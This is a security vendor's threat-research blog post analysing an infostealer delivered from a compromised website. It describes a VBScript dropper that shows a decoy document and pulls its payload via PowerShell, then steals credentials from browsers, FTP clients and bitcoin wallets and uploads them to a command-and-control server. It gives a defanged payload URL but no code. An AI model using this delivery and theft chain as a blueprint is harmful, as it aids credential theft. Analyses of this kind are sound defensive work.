Secure Cloud Transformation: The CIO’s Journey Request Your Copy
Secure Cloud Transformation: The CIO’s Journey
Request Your Copy


The Cloud-First Architect™

Content for architects, by architects

Check it Out

Infostealer spreading through a compromised website

By: Tarun Dewan

Infostealer spreading through a compromised website

The Zscaler ThreatLabZ team has uncovered a new password stealer malware variant being delivered through a compromised website. The payload is Microsoft Intermediate Language (MSIL) compiled and steals the passwords from victims' system, browser, and FTP software.

The payload analyzed in this blog was served from the compromised website dnoymuzik[.]com/wp-content/test/conhost[.]exe. 

Delivery vector

The delivery method for this malware is the VBScript, which downloads the payload from the compromised website, and then downloads a decoy document to lead the victim to believe that the downloaded files are legitimate. Activities performed by VBScript file are as follows:

  • Downloads decoy document
  • Terminate Microsoft Word process
  • Downloads payload through a PowerShell command
  • Removes the document recovery entries of Microsoft Word through registry entries


Figure 1: Screen capture of VBScript activity

Figure 2: Screen capture decoy document

The decoy document poses as a "public service" message from a government organization and includes spam mitigation instructions. 

Once the malware is executed, it performs various password stealing activities, such as checking for antivirus and looking into the directories and files from which it will steal information. The most interesting function of this malware is that it also behaves like a file stealer, as it checks for interesting strings in the system with enumeration of various files and folders and uploads to the malware's C&C once it grabs the sensitive information (Figure 3):

Figure 3: Checking for installed antivirus products

Figure 4: Looking at directories and files for stealing passwords and collecting information

Figure 5: Checking for strings in the system with enumeration of various files and folders and upload to the C&C

The following screen captures show different extensions that the malware targets in the victim's machine for stealing credentials:

Figure 5: Strings of extensions

Figure 6: Strings of extensions

The screen captures below show snippets of password stealing of various browsers and software before uploading to the C&C server:

Figure 7: Chrome password stealer

Figure 8: Uploading to the C&C server

Figure 9: CuteFTP password stealer

Figure 10: Electrum Bitcoin password stealer

Figure 11: Firefox password stealer

The malware steals passwords from the following software and browsers:

  • Armory Wallet
  • Chrome
  • Firefox
  • CuteFTP
  • FileZilla
  • Putty
  • Electrum bitcoin wallet
  • WinSCP Passwords


Network communication:

Figure 12: Network information


Below is the snapshot of stolen data from the victim's machine by the malware author

Figure 13: Stolen data


This is yet another infostealer malware that attempts to steal stored credentials from a victim's machine. The malware also contains modules to steal sensitive files such as private keys, SSH keys, bitcoin wallets, etc. ThreatLabZ will continue to monitor this malware to ensure that Zscaler customers are protected.

The Zscaler Cloud Sandbox report highlighting the indicators is shown in screenshot below: 

Figure 14: Zscaler Cloud Sandbox malware report

Suggested Blogs